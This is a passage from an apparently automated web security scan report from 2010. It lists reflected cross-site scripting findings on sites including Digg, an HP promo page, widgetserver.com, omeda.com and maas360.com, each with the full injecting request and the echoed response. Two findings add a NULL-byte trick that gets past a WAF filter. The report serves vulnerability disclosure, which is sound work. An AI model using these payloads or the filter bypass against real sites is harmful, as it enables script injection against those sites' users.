configurationParams : {"wbx_ns_image":"http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png","wbx_ns_link":"http:/ad.doubleclick.neta0036<img src=a onerror=alert(1)>08dc7b33eb9/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandler.initializationParams["fif"];
if(fifMode && WIDGETBOX.platform.FriendlyIFrame){
...[SNIP]...

2.83. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 12]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 12 is copied into the HTML document as plain text between tags. The payload 44b22<img%20src%3da%20onerror%3dalert(1)>852bd0645a2 was submitted in the REST URL parameter 12. This input was echoed as 44b22<img src=a onerror=alert(1)>852bd0645a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk44b22<img%20src%3da%20onerror%3dalert(1)>852bd0645a2 HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:11 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17788


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
5","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png","wbx_ns_link":"http:/ad.doubleclick.net/clk44b22<img src=a onerror=alert(1)>852bd0645a2"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandler.initializationParams["fif"];
if(fifMode && WIDGETBOX.platform.FriendlyIFrame){

...[SNIP]...

2.84. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c5a01<img%20src%3da%20onerror%3dalert(1)>226f8532ecf was submitted in the REST URL parameter 4. This input was echoed as c5a01<img src=a onerror=alert(1)>226f8532ecf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/idc5a01<img%20src%3da%20onerror%3dalert(1)>226f8532ecf/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:47 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17788


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
adyCallback, true);
}
};

WIDGETBOX.platform.WidgetConfig = WidgetConfig;
})();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"platform":"InsertWidget","idc5a01<img src=a onerror=alert(1)>226f8532ecf":"8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475"},

configurationParams : {"wbx_ns_image":"http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png","wbx_ns_link":"http:/ad.doublec
...[SNIP]...

2.85. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload cee27<img%20src%3da%20onerror%3dalert(1)>ee6ba422ee7 was submitted in the REST URL parameter 5. This input was echoed as cee27<img src=a onerror=alert(1)>ee6ba422ee7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475cee27<img%20src%3da%20onerror%3dalert(1)>ee6ba422ee7/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:50 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17788


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
true);
}
};

WIDGETBOX.platform.WidgetConfig = WidgetConfig;
})();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"id":"8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475cee27<img src=a onerror=alert(1)>ee6ba422ee7","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png","wbx_ns_link":"http:/ad.doubleclick.net/clk"
...[SNIP]...

2.86. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 3a824<img%20src%3da%20onerror%3dalert(1)>faddef53f15 was submitted in the REST URL parameter 6. This input was echoed as 3a824<img src=a onerror=alert(1)>faddef53f15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:3a824<img%20src%3da%20onerror%3dalert(1)>faddef53f15/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:53 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17780


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"id":"8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http:3a824<img src=a onerror=alert(1)>faddef53f15/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png","wbx_ns_link":"http:/ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.pl
...[SNIP]...

2.87. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 4c632<img%20src%3da%20onerror%3dalert(1)>ab7a6b90e92 was submitted in the REST URL parameter 7. This input was echoed as 4c632<img src=a onerror=alert(1)>ab7a6b90e92 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com4c632<img%20src%3da%20onerror%3dalert(1)>ab7a6b90e92/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:56 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17780


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
tform.WidgetConfigPathHandler = {
initializationParams : {"id":"8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http:/img.widgetbox.com4c632<img src=a onerror=alert(1)>ab7a6b90e92/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png","wbx_ns_link":"http:/ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfi
...[SNIP]...

2.88. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 4b7a4<img%20src%3da%20onerror%3dalert(1)>a00070d10d9 was submitted in the REST URL parameter 8. This input was echoed as 4b7a4<img src=a onerror=alert(1)>a00070d10d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded4b7a4<img%20src%3da%20onerror%3dalert(1)>a00070d10d9/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:59 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17780


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
getConfigPathHandler = {
initializationParams : {"id":"8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http:/img.widgetbox.com/uploaded4b7a4<img src=a onerror=alert(1)>a00070d10d9/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png","wbx_ns_link":"http:/ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHand
...[SNIP]...

2.89. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 5d93e<img%20src%3da%20onerror%3dalert(1)>6d74913966e was submitted in the REST URL parameter 9. This input was echoed as 5d93e<img src=a onerror=alert(1)>6d74913966e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db055d93e<img%20src%3da%20onerror%3dalert(1)>6d74913966e/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:01 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17788


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
ializationParams : {"id":"8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db055d93e<img src=a onerror=alert(1)>6d74913966e/ibm_backupe.png","wbx_ns_link":"http:/ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandler.initializationParams["fif"];

...[SNIP]...

2.90. https://cxo.omeda.com/cgi-win/cio.cgi [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://cxo.omeda.com
Path:   /cgi-win/cio.cgi

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload abba8<script>alert(1)</script>cc716b12454 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-winabba8<script>alert(1)</script>cc716b12454/cio.cgi HTTP/1.1
Host: cxo.omeda.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Thu, 16 Dec 2010 15:01:47 GMT
Server: WebSitePro/2.5.8
Accept-ranges: bytes
Content-type: text/html
Content-length: 311

<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY bgcolor="White"><H2>404 Not Found</H2>
The requested URL was not found on this server:<P><CODE>/cgi-winabba8<script>alert(1)</script>cc716b12454/cio.cgi<P>
...[SNIP]...

2.91. https://cxo.omeda.com/cgi-win/cio.cgi [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://cxo.omeda.com
Path:   /cgi-win/cio.cgi

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cf65d<script>alert(1)</script>77b2e91fe7a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-win/cio.cgicf65d<script>alert(1)</script>77b2e91fe7a HTTP/1.1
Host: cxo.omeda.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Thu, 16 Dec 2010 15:01:49 GMT
Server: WebSitePro/2.5.8
Accept-ranges: bytes
Content-type: text/html
Content-length: 304

<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY bgcolor="White"><H2>404 Not Found</H2>
The requested URL was not found on this server:<P><CODE>/cgi-win/cio.cgicf65d<script>alert(1)</script>77b2e91fe7a<P>
...[SNIP]...

2.92. https://cxo.omeda.com/cgi-win/cio.cgi [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://cxo.omeda.com
Path:   /cgi-win/cio.cgi

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 350aa"><script>alert(1)</script>3be711c838a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-win/cio.cgi?350aa"><script>alert(1)</script>3be711c838a=1 HTTP/1.1
Host: cxo.omeda.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 16 Dec 2010 15:01:31 GMT
Server: WebSitePro/2.5.8
Accept-ranges: bytes
Content-type: text/html
Content-length: 39866

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title
...[SNIP]...
<input type="hidden" name="CALLINGURL" value="350aa"><script>alert(1)</script>3be711c838a=1">
...[SNIP]...

2.93. http://digg.com/submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0029eb0"><script>alert(1)</script>55798b8d873 was submitted in the REST URL parameter 1. This input was echoed as 29eb0"><script>alert(1)</script>55798b8d873 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%0029eb0"><script>alert(1)</script>55798b8d873 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:56:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1938518164606297025%3A141; expires=Sat, 15-Jan-2011 14:56:44 GMT; path=/; domain=digg.com
Set-Cookie: d=6314c08fb07e75c8fc37ada4064b945418a49163cfa4e84e32b221b946b5dcbd; expires=Wed, 16-Dec-2020 01:04:24 GMT; path=/; domain=.digg.com
X-Digg-Time: D=232451 10.2.128.255
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15306

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg - error_ - Profile</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics,
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%0029eb0"><script>alert(1)</script>55798b8d873.rss">
...[SNIP]...

2.94. http://digg.com/submit/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0099d9f"><script>alert(1)</script>ce39e2bb6df was submitted in the REST URL parameter 1. This input was echoed as 99d9f"><script>alert(1)</script>ce39e2bb6df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%0099d9f"><script>alert(1)</script>ce39e2bb6df/ HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:56:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1938518164606297025%3A141; expires=Sat, 15-Jan-2011 14:56:51 GMT; path=/; domain=digg.com
Set-Cookie: d=2f20fe84cebb2890d911e48925fd04191c6abbab9f05bb77310e9fe59ba4facb; expires=Wed, 16-Dec-2020 01:04:31 GMT; path=/; domain=.digg.com
X-Digg-Time: D=219386 10.2.130.26
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15307

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg - error_ - Profile</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics,
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%0099d9f"><script>alert(1)</script>ce39e2bb6df/.rss">
...[SNIP]...

2.95. https://h30406.www3.hp.com/campaigns/2010/promo/1-8KF4V/landing.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://h30406.www3.hp.com
Path:   /campaigns/2010/promo/1-8KF4V/landing.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51aa9"><a>24e2ae1112b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /campaigns/2010/promo/1-8KF4V/landing.php?51aa9"><a>24e2ae1112b=1 HTTP/1.1
Host: h30406.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 16 Dec 2010 14:56:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-type: text/html
X-Powered-By: PHP/4.3.8
Set-Cookie: regioncodecookie=NA; expires=Thu, 16-Dec-2010 14:57:50 GMT; path=/; domain=.hp.com

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us" xmlns:m="http://schemas.microsoft.com/office/2004/12/omml" xmlns:v="urn:schema
...[SNIP]...
<iframe src="box1.php?51aa9"><a>24e2ae1112b=1" name="" id="overlay-iframe" width="416" height="250" marginwidth="6" marginheight="6" align="middle" frameborder="0" scrolling="no">
...[SNIP]...

2.96. http://hs.maas360.com/white-paper/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hs.maas360.com
Path:   /white-paper/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b26bf"><script>alert(1)</script>4ded530f900 was submitted in the REST URL parameter 1. This input was echoed as b26bf\"><script>alert(1)</script>4ded530f900 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /white-paperb26bf"><script>alert(1)</script>4ded530f900/ HTTP/1.1
Host: hs.maas360.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 14:57:16 GMT
Server: Apache
X-Powered-By: W3 Total Cache/0.8.5.2
X-Pingback: http://forum.maas360.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Last-Modified: Thu, 16 Dec 2010 14:57:17 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14748

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11"><script type="
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://hs.maas360.com/white-paperb26bf\"><script>alert(1)</script>4ded530f900/"/>
...[SNIP]...

